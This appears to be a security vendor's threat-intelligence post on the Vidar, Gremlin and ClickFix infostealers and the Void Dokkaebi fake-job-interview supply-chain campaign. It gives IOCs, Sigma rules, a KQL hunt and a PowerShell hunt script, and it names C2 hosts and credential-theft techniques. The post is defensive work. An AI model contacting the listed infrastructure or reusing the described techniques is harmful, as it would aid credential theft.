Back to Intelligence

Vidar v1.5, Gremlin & Void Dokkaebi: Cross-Platform Credential Harvesting & Supply Chain Threats — OTX Pulse Analysis

SA
Security Arsenal Team
May 21, 2026
6 min read

Intelligence from OTX pulses dated 2026-05-21 indicates a surge in sophisticated credential theft and infrastructure hijacking campaigns. The threat landscape is dominated by the re-emergence of the Vidar infostealer, rewritten in Go (v1.5) with enhanced evasion capabilities, and Gremlin Stealer, which utilizes instruction virtualization to hide in plain sight. Simultaneously, the North Korean-aligned threat actor Void Dokkaebi (WageMole) is actively conducting supply chain attacks targeting software developers via fake job interviews and malicious repository poisoning. Additionally, a macOS ClickFix campaign is leveraging social engineering to deploy AppleScript stealers. While primarily focused on data exfiltration, these actors are alongside infrastructure exploitation campaigns targeting Cisco Catalyst SD-WAN vulnerabilities to establish persistence within network perimeters.

Threat Actor / Malware Profile

Vidar v1.5 (Go)

  • Family: Infostealer (Arkei descendant)
  • Distribution: Malvertising, phishing attachments.
  • Payload Behavior: Native Go PE (7 MB). Steals browser credentials, crypto wallets, and 2FA sessions.
  • C2 Communication: Dead-drop URLs hosted on Telegram and Steam profile pages to bypass network filtering.
  • Anti-Analysis: Heavy sandbox checks (12-category scoring system).

Gremlin Stealer

  • Family: Infostealer (关联 Agent Tesla, Lokibot)
  • Distribution: Spam emails, obfuscated attachments.
  • Payload Behavior: Hides payload within embedded resource files. Siphons payment card details and browser data.
  • C2 Communication: Telegram exfiltration.
  • Anti-Analysis: Commercial packing utility with instruction virtualization (custom bytecode execution via private VM).

Void Dokkaebi (WageMole)

  • Actor: North Korea-aligned ( Famous Chollima)
  • Target: Software Developers, Blockchain Infrastructure.
  • Modus Operandi: Fake job interviews lure victims to clone malicious Git repositories.
  • Mechanism: VS Code exploitation via malicious task configurations (.vscode/tasks.) and Git history tampering to execute DEV#POPPER RAT or OmniStealer.

macOS ClickFix

  • Platform: macOS / Windows
  • Vector: Fake CAPTCHA pages ("ClickFix")
  • Payload: AppleScript-based infostealer.
  • Behavior: Harvests Keychain databases, 12+ browsers, 200+ extensions, and 16 crypto wallets.

IOC Analysis

The provided pulses deliver a mix of infrastructure and file-based indicators requiring immediate operationalization:

  • IP Addresses: Includes Telegram nodes (149.154.167.99), generic VPSs (135.181.237.59), and SD-WAN exploitation IPs (176.65.139.31). SOC teams should block these on perimeter firewalls and enrich with threat intel feeds to identify adjacent infrastructure.
  • Domains: bull-run.fun and spot-wave.fun are associated with the macOS ClickFix campaign. These should be sinkholed or blocked at the DNS layer.
  • File Hashes: Multiple MD5, SHA1, and SHA256 hashes are provided for Vidar (Go binary), Gremlin (packed), and the macOS AppleScript payloads. These must be uploaded to EDR detection rulesets for immediate quarantine.
  • CVEs: While not direct IOCs, CVE-2026-20182 and CVE-2026-20133 indicate the specific attack surface being exploited for initial access in network environments.

Operational Note: Use YARA rules to detect the Go binary structure of Vidar v1.5 and the specific resource section signatures of Gremlin Stealer, as hash-bashing alone may miss future variants.

Detection Engineering

YAML
title: Potential Vidar Stealer Go Binary Execution
id: 4f8e2b1a-9c3d-4f5e-8b1a-2c3d4e5f6a7b
description: Detects execution of Go binaries exhibiting behavior consistent with Vidar v1.5, including network connections to non-standard ports or Telegram/Steam infrastructure.
status: experimental
date: 2026/05/21
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6648d1a0b1e1b10f2c3e4f5b
tags:
    - attack.credential_access
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection_go:
        Image|endswith:
            - '.exe'
        Company|contains:
            - 'Not Signed' # Generic check, refine via Go compiler signatures if available
    selection_network:
        NetworkEvent|contains:
            - '149.154.167.99' # Known Telegram IP used in pulse
            - 'steamcommunity.com'
            - 't.me'
    condition: selection_go and selection_network
falsepositives:
    - Legitimate Go applications communicating with Telegram APIs
level: high
---
title: VS Code Task Execution - Potential Void Dokkaebi Supply Chain
id: 5a9f3c2b-1d4e-5f6a-9b0c-1d2e3f4a5b6c
description: Detects suspicious process execution patterns indicative of VS Code tasks being used as an initial access vector (Fake Job Interview lure).
status: experimental
date: 2026/05/21
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6648d1a0b1e1b10f2c3e4f5b
tags:
    - attack.initial_access
    - attack.supply_chain
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            - '\Code.exe'
            - '\code.exe'
    selection_child:
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_cli:
        CommandLine|contains:
            - 'clone'
            - 'npm install'
            - 'nuget'
            - 'dotnet restore'
    condition: selection_parent and selection_child and selection_cli
falsepositives:
    - Legitimate developer builds
level: high
---
title: macOS ClickFix AppleScript Network Activity
id: 6b0a4d3c-2e5f-6a7b-0c1d-2e3f4a5b6c7d
description: Detects macOS osascript processes initiating network connections to suspicious domains associated with the ClickFix campaign.
status: experimental
date: 2026/05/21
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6648d1a0b1e1b10f2c3e4f5b
tags:
    - attack.execution
    - attack.credential_access
logsource:
    category: network_connection
    product: macos
detection:
    selection_process:
        Image|endswith:
            - '/osascript'
            - '/Terminal'
    selection_domain:
        DestinationHostname|contains:
            - 'bull-run.fun'
            - 'spot-wave.fun'
    condition: selection_process and selection_domain
falsepositives:
    - Low
level: critical

KQL Hunt (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for Vidar and Gremlin C2 traffic and ClickFix domains
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl in ("bull-run.fun", "spot-wave.fun", "steamcommunity.com") 
   or RemoteIP in ("149.154.167.99", "135.181.237.59", "176.65.139.31")
| extend Info = pack("InitiatingProcessAccount", InitiatingProcessAccount, "InitiatingProcessFileName", InitiatingProcessFileName)
| project Timestamp, DeviceName, ActionType, RemoteUrl, RemoteIP, RemotePort, Info
| order by Timestamp desc

PowerShell IOC Hunt Script

PowerShell
<#
.SYNOPSIS
    Hunt script for Vidar, Gremlin, and ClickFix IOCs provided in OTX Pulse.
.DESCRIPTION
    Checks running processes against known hashes and network connections to malicious IPs.
#>

$MaliciousHashes = @(
    "702ef1b4007f07887e9faaee0667b50b", # Vidar MD5
    "87332fcdf79e1c0bfb7713e9a52c0313",
    "1bd0a200528c82c6488b4f48dd6dbc818d48782a2e25ccd22781c5718c3f62f5", # Gremlin SHA256
    "e12285f507c847b986233991b86b22e3"  # ClickFix MD5
)

$MaliciousIPs = @(
    "149.154.167.99",
    "135.181.237.59",
    "176.65.139.31"
)

Write-Host "[+] Checking for malicious file hashes in running processes..." -ForegroundColor Cyan
Get-Process | ForEach-Object {
    $process = $_
    try {
        $path = $process.Path
        if ($path -and (Test-Path $path)) {
            $hash = (Get-FileHash -Path $path -Algorithm MD5).Hash.ToLower()
            if ($MaliciousHashes -contains $hash) {
                Write-Host "[!] MALICIOUS PROCESS DETECTED: $($process.ProcessName) (PID: $($process.Id)) - Path: $path" -ForegroundColor Red
            }
        }
    } catch {}
}

Write-Host "[+] Checking for active network connections to malicious C2 IPs..." -ForegroundColor Cyan
$connections = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue
foreach ($conn in $connections) {
    $remoteIP = (Get-Process -Id $conn.OwningProcess -ErrorAction SilentlyContinue).ProcessName
    $ipString = $conn.RemoteAddress.ToString()
    if ($MaliciousIPs -contains $ipString) {
        Write-Host "[!] SUSPICIOUS CONNECTION: Process $remoteIP connected to $ipString on port $($conn.RemotePort)" -ForegroundColor Red
    }
}

Write-Host "[+] Hunt complete." -ForegroundColor Green

Response Priorities

  • Immediate: Block all IOCs (IPs, Domains, Hashes) at the perimeter and on endpoints. specifically 149.154.167.99, bull-run.fun, and the SHA256 hashes for Gremlin/Vidar.
  • 24 Hours: Initiate credential reset and identity verification for software developers and staff with access to source code repositories (GitHub/GitLab) due to the Void Dokkaebi campaign.
  • 1 Week: Patch Cisco Catalyst SD-WAN vulnerabilities (CVE-2026-20182, CVE-2026-20133). Implement strict policies allowing only signed VS Code extensions and audit .vscode/tasks. files in repository commits.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialsinfostealervidarsupply-chainclickfixcredential-theft

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action